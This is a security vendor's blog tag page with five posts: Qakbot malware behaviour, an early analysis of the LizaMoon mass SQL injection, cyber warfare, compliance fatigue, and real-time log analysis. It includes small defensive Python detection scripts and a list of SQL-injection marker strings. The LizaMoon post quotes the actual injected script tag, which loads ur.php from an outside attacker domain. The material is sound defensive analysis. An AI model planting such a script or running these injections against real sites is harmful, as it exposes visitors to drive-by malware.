Posts tagged: 'information security'

The following posts are associated with the tag you have selected. You may subscribe to the RSS feed for this tag to receive future updates relevant to the topic(s) of your interest.

http://blog.logrhythm.com/tags/information-security/feed
 
 

Qakbot: Still Targeting Corporate and Business Networks

While the recent Hartford Insurance breach, the subject of an earlier post by Dave Pack, didn't make a lot of noise, it's interesting to see an old piece of malware like Qakbot (first discovered in 2007) still making its rounds in 2011. There are a number of things about this malware that make it particularly interesting.

Although certain Trojans that target banking credentials, such as Zeus, are put up for sale on the black market as crimeware kits, Qakbot does not seem to follow this pattern. While many kinds of Trojans take a blanket approach to stealing data and passwords, Qakbot is designed to differentiate between data stolen from targeted devices and passwords it may have collected on non-target machines. Another interesting behavior of Qakbot is that it also acts as a worm, attempting to spread via network shares. While this combination of worm and Trojan behavior is not unique, it certainly makes Qakbot more dangerous. And if that isn't enough, Qakbot reportedly employs up to seven different methods to ensure that it's not being reverse engineered by security researchers.

Evidence points to a dedicated group of people being behind this piece of crimeware. If that's true, it seems logical that The Hartford Insurance Company will not be the last business to be targeted by Qakbot.

With that being said, let’s take a look at what a typical Qakbot infection looks like.

First, the Trojan is VMware-aware: if it detects that it's being run on a VMware virtual machine, it will simply not run. Once running, however, a dump of the file's strings from memory gives us quite a bit of insight into what the file will try to do. Evidence of its attempts to thwart security researchers can be seen in various places.

Among other things, the string dump shows checks for the presence of various security-related .exes and further anti-analysis checks, references to the URLs where stolen data will be dumped (notice the DNS query), information on the data it will be sending out, including the version of qbot (qakbot) running, and outbound IRC traffic.

Based on what we've seen in the strings, we can expect Qakbot to generate a variety of logged behavior. Monitoring for unexpected outbound FTP, IRC and port 80 traffic is one way to identify potential Qakbot activity. Another is to create a shared folder on the network that is designed to always remain empty and monitor it for the presence of new files, which captures the worm-like behavior.
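As a rough illustration of the second idea, here is a minimal sketch (Python) of a watcher for such a honeypot share. The share path, polling interval and alert log file are hypothetical placeholders, and in practice you would forward the event to your SIEM rather than to a local file:

    import os
    import time
    import logging

    # Hypothetical decoy share that should always be empty; adjust to your network.
    HONEYPOT_SHARE = r"\\fileserver\decoy$"
    POLL_INTERVAL_SECONDS = 30

    logging.basicConfig(
        filename="honeypot_share_alerts.log",
        level=logging.WARNING,
        format="%(asctime)s %(levelname)s %(message)s",
    )

    def watch_share(path):
        """Poll a share that should always be empty; any new file is suspicious."""
        known = set(os.listdir(path))
        while True:
            time.sleep(POLL_INTERVAL_SECONDS)
            current = set(os.listdir(path))
            for new_file in sorted(current - known):
                # Worm-like behavior (e.g. Qakbot copying itself to open shares)
                # would show up here; this is the event to alarm on.
                logging.warning("Unexpected file on honeypot share: %s", new_file)
            known = current

    if __name__ == "__main__":
        watch_share(HONEYPOT_SHARE)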

If you want to know more about how we can help you detect malware with log data, feel free to contact us.

 


 
 

Initial Thoughts: LizaMoon Mass SQL Injection

A more in-depth analysis of the LizaMoon attack will follow; in the meantime, here are a few early thoughts from Dave Pack, posted while his blogger profile gets set up. Dave manages LogRhythm's Knowledge Engineering department and has been working in information security and advanced data analysis for over ten years.

Various security organizations and bloggers are tracking a mass SQL injection attack currently being called "LizaMoon" (named after one of the first websites identified). While we haven't had a chance to fully analyze the attack, based on information being aggregated by SANS and Stack Overflow, it looks like this is a combination SQL injection/stored XSS attack, with the final targets being client-side end users.

It appears that the SQL injection is taking advantage of a web application vulnerability. The injection itself delivers a stored XSS attack to the vulnerable web servers, consisting of a script tag (</title><script src=http://google-stats49.info/ur.php>) that redirects unlucky internet users to a different site hosting a file named ur.php. This PHP file is where the dirty work is actually done: it launches an exploit that installs fake AV software on the end user's machine.

What's really interesting is that the SQL injection is just a means of delivering the much more dangerous stored XSS to vulnerable web servers. Stored XSS attacks are much scarier than standard reflected XSS because a user doesn't have to be tricked into clicking a maliciously crafted URL. The XSS attack simply sits on the web server, waiting for any unlucky internet user to browse to the compromised website.

We’re attempting to get our hands on the ur.php code for further analysis of the client-side exploit, after which one of our analysts will be posting an update.  In the meantime, here are some things both web administrators and end users can do to detect this attack and help protect against it.

SQL Injection:

1. Implement standard protections, such as sanitizing all database inputs and using parameterized queries across the board, to limit what can get through.

2. Check whether your web server is being targeted; most types of SQL injection can be spotted in the web server logs.

a. In particular, look at your access logs for “)-” in the URL. It is extremely rare for legitimate input to be commenting out the rest of a SQL statement.

b. Check for various encodings of the same string as well. LogRhythm provides an out-of-the-box AI Engine advanced correlation rule that looks for these strings in a URL and will alarm on any injection attempts; a rough, generic sketch of this kind of log check is shown below.
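For readers who want to experiment outside of a SIEM, here is a minimal, generic sketch (Python) of the log check described in 2a and 2b. The log path and the marker strings are illustrative assumptions on my part, not a copy of LogRhythm's correlation rule:

    import urllib.parse

    # Hypothetical access log path; substitute your own web server's log (IIS, Apache, etc.).
    ACCESS_LOG = "access.log"

    # Illustrative markers only: comment/termination sequences and keywords commonly
    # abused in this class of injection. Tune the list for your own environment.
    SUSPICIOUS_MARKERS = [")--", "';", "declare @", "cast("]

    def suspicious_requests(path):
        """Yield log lines whose URL-decoded form contains a suspicious marker."""
        with open(path, encoding="utf-8", errors="replace") as log:
            for line in log:
                # Decode %xx and '+' encodings so encoded variants of the same
                # string are caught as well.
                decoded = urllib.parse.unquote_plus(line).lower()
                if any(marker in decoded for marker in SUSPICIOUS_MARKERS):
                    yield line.rstrip()

    if __name__ == "__main__":
        for hit in suspicious_requests(ACCESS_LOG):
            print("Possible SQL injection attempt:", hit)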

Stored XSS:

1. If the functionality is available in your infrastructure, block any attempts to access a website with "ur.php" in the URL (a simple log-based flag for this is sketched after this list).

2. Practice standard "safe browsing" techniques. Many browsers offer a plugin, such as NoScript, that forces users to explicitly grant any script permission to run client-side. Use a plugin like this, or disable JavaScript altogether if it's not needed for business purposes.
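Along the same lines, here is an equally rough sketch of the first suggestion, flagging any request that references ur.php as it appears in a proxy or web-filter log. The log source and format are assumed; actual blocking belongs in your proxy or web filter:

    import sys

    # Minimal sketch: pipe proxy or web-filter log lines through this script,
    # e.g.  tail -f proxy.log | python flag_urphp.py
    # Any request referencing the ur.php payload is flagged for follow-up.
    BLOCKED_FRAGMENT = "ur.php"

    for line in sys.stdin:
        if BLOCKED_FRAGMENT in line.lower():
            print("ALERT: request referencing ur.php:", line.rstrip(), file=sys.stderr)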


 
 

Can you keep a soldier out of your network?

The last year has been full of stunning news about cyber security, and you've probably read about cyber incidents such as HBGary's hack by Anonymous, the Stuxnet worm, and what looks like a back-and-forth cyber battle between China and the United States (read about these events here, here, here, and here). These events have become a media circus simply because they all add up to "really bad news" for workers in information technology and information security.

The more information is released about how useful cyber warfare is, or is perceived to be (such as WikiLeaks' UN diplomatic cables), the more it inspires other countries to create their own cyber warfare capabilities (and here, and here, and even limiting summit talks here).

Looking back over the growth of cyber security during the last 30 years, the main goal has been to stop criminal hackers, disgruntled employees and malicious software. But what happens if your organization becomes the target of a military mission? At least 45,000 computers were infected by Stuxnet, and as cyber war proliferates there is now a real possibility of your organization becoming a victim of collateral damage.

The Internet isn't a very good battleground for military warfare, though. In terrestrial warfare, bombs explode and destroy the technology that makes advanced weaponry function. Cyber-weapons, on the other hand, are like dropping Rosetta Stones on enemies: all the zero-day exploits, obfuscation techniques, tools and control methods are exposed and can be reverse engineered. Those capabilities can be added to the opponent's arsenal, and apparently there are personal safety risks to being involved.

It's also of great value to be invisible while performing cyber warfare in order to avoid an incident. Anonymity techniques can be less than magic and still be very effective, and in many cases attacks can be conducted by contractors and/or non-affiliated hackers. Organizations that maintain a public Internet presence are at a huge disadvantage against these ambushing, anonymous aggressors.

Organizations should take cyber warfare very seriously as the latest evolution of computer security. For the next decade or more, companies will hire tens of thousands of cyber security experts who will be expected to do no less than keep government-sponsored hackers out of their networks.

Proper planning, enforcing security policy and improving situational awareness will be critical for handling the next wave of government-funded cyber threats. Access control, usage monitoring, security auditing, vulnerability management, role separation and network segmentation will need to be considered and implemented for all IT projects. SIEM solutions and other security tools will become even more critical to maintaining an up-to-date security posture.

Are you ready for the security risks of the next decade?


 
 

Compliance – Time to Change the Future

"He's having the worst day of his life… over and over again."

Ring any bells? It's the strapline from the film Groundhog Day, which sees Bill Murray's character, Phil Connors, caught in a time warp, repeatedly waking up to find that things are exactly the same as the day before.

The film charts Connors’ frustration at being faced with the same situations every single day and seemingly unable to start the next day afresh.

Whether it's travelling the same daily commute, or having repeated discussions about the latest information security regulation or directive, I'm sure we've all related to that character at some point. Particularly if you are a miserable old curmudgeon like me (in fact, I think you will find that Bill Murray based his screen persona on yours truly…).

With a seemingly endless list of new or amended regulations being introduced, it's no wonder that IT security professionals can often feel like they're stuck in their own Groundhog Day. No sooner does an organisation achieve compliance with one regulation than another comes along, often bringing with it a sense of déjà vu for all involved.

Take the Payment Card Industry Data Security Standard, for example. The first standard was introduced in December 2004, with the most recent revision in 2008 and an updated version due this October. As a result, the regulation seems to have been around for an eternity, and it's no wonder that mentioning the subject will trigger a glazed response from many in the industry.

This rings even more true in the public sector, where there seems to be a never-ending stream of new initiatives and guidelines relating to information management and technology infrastructures. In the UK alone, organisations are faced with, for example, GSI/GCSX, CoCo compliance and, latterly, the Memo 22 replacement, Good Practice Guide 13 (GPG 13).

Information security is an ever-changing beast. As technology evolves, so do the risks posed, which is why it's imperative that organisations, public and private, don't become complacent when it comes to compliance.

As Bill Murray found in Groundhog Day, the only way to escape the monotony of his time warp was to re-assess his attitude to life. Of course I’m not suggesting for one minute that we turn our lives upside down, but there’s a lot to be said for taking a proactive approach when it comes to guarding against risk.

In every information security-related regulation, there's a requirement in some shape or form to protect the information being held by the organisation, from credit card details to children-at-risk records. Despite this, all too often security incidents are discovered after the event, once the damage has been done.

Protective monitoring tools such as LogRhythm's bring a new proactive dimension to information security, fulfilling multiple compliance requirements in the process. By centralising and automating how log data is managed, organisations can gain clear insight into network and user behaviour. Any irregular activity is automatically flagged in real time, while reporting for compliance purposes becomes simpler and less time-consuming.

As with most Hollywood films, Bill Murray’s ultimate goal was to get the girl. While I can’t guarantee that LogRhythm will bring similar results, it will help ease the Groundhog Day frustrations for those facing the continued compliance struggle.

Unless you’re happy living in Punxsutawney of course….


 
 

The Importance of Real-Time Analysis for Security and Operations

As I sit out on the back patio enjoying a beautiful spring Mother's Day morning, I thought I'd momentarily press the pause button and delay my familial responsibility of cooking the most amazing breakfast ever to talk for a bit about the significance of real-time information access as it relates to log and event management (SIEM).

What prompted me to address real-time? The simple fact that there's been a lot of action in the news over the last couple of weeks dealing with real-time "fires" that need to be put out. From the recent unsuccessful Times Square car bombing to the difficult-to-wrap-your-head-around massive oil leak vomiting hundreds of thousands of barrels of oil into the Gulf, real-time access to relevant information is an absolutely critical component of our investigative capacity to both identify and stop these types of threats.

Take the Times Square bomber, Faisal Shahzad, for example. Despite a wealth of forensic data tying him to the bombing attempt, and a relatively quick path to identifying him as a suspect, Shahzad was minutes from successfully fleeing the country on a commercial airliner. Why? Because the process for adding his name to the no-fly list did not happen in real time, and the TSA was not notified until he had already boarded the plane. Fortunately, federal officials were able to turn the plane around before take-off and apprehend him.

Likewise, the Deepwater Horizon oil spill is the result of a combination of process and technical breakdowns. A critical mechanical failure, combined with a deadly buildup of methane gas that went undetected, ultimately caused a catastrophic explosion. The resulting environmental and economic disaster will be felt for years. It's hard not to wonder what might have been different if the right people had been notified of the faulty equipment in time to repair it, or if the methane buildup had been detected and eliminated before reaching critical mass.

And it's no stretch to say that these examples are analogous to an enterprise IT environment: the power of real-time analysis is unmistakable. I've worked in IT environments where an infection went undetected by a myriad of security products, from host-based security tools to the NIDS product sniffing off the wire. Whether the infection was a zero-day exploit or simply missed by the security products is another story; either way, the question is, "How do you identify the root cause and prevent it...rapidly?" Just as more pieces of a complex puzzle help paint the whole picture, log data from disparate sources provides core pieces of the puzzle, giving the analyst visibility into the labyrinth of data available to help identify root cause. To accomplish this effectively you'll need fingertip access to all of your log data. Moreover, you'll want to be able to view the data in real time, at the time of capture.

In the example above, we were able to quickly identify the port the botnet was communicating on and then search for internal systems attempting to communicate on that port. This uncovered, in real time, over 25 infected systems throughout the enterprise (by DNS name and IP address), and these systems were quickly removed from the network and cleaned.
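To make that concrete, here is a minimal sketch (Python) of the kind of search we ran, assuming connection logs exported to CSV. The file name, column names and the command-and-control port below are placeholders, not the actual values from that engagement:

    import csv
    from collections import Counter

    # Hypothetical firewall/connection log exported as CSV with columns:
    # timestamp, src_ip, src_port, dst_ip, dst_port, action
    CONNECTION_LOG = "firewall_connections.csv"
    BOTNET_PORT = "16667"  # placeholder for the command-and-control port identified

    def infected_hosts(path, c2_port):
        """Count internal hosts attempting to talk on the suspect C2 port."""
        hits = Counter()
        with open(path, newline="") as handle:
            for row in csv.DictReader(handle):
                if row["dst_port"] == c2_port:
                    hits[row["src_ip"]] += 1
        return hits

    if __name__ == "__main__":
        for host, attempts in infected_hosts(CONNECTION_LOG, BOTNET_PORT).most_common():
            print(f"{host}: {attempts} connection attempts to port {BOTNET_PORT}")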

Although in this example we're discussing a security-related issue, the real-time use case carries over into other parts of the business, including operations. Consider a virtualized environment heavily reliant on an underlying host system to run hundreds of production systems. What happens if that underlying system has an issue that potentially impacts the production environment? A critical failure in this case could create a significant event, impacting the business as a whole. I've dealt with this in the field, and real-time access to the log data provided the root cause analysis necessary to understand the issue, which in turn triggered the effort to quickly resolve the now-known problem. The moral of the story: immediate access to real-time log data can provide the magnet every analyst needs to quickly find the needle in their haystack.

Okay, I think I hear the kids stirring, so I'd better focus on my wife and family before I get in trouble for working on this of all days. Happy Mother's Day to all the moms out there.

To see some ideas for how you can help with the environmental cleanup and humanitarian efforts of what is being predicted to be one of the worst environmental catastrophes in United States history, please visit:
http://www.sierraclub.org/
http://crcl.org/
https://secure.oxfamamerica.org/site/Donation2?df_id=4360&4360.donation=form1&JServSessionIdr004=hxfvbljiv1.app240a

 
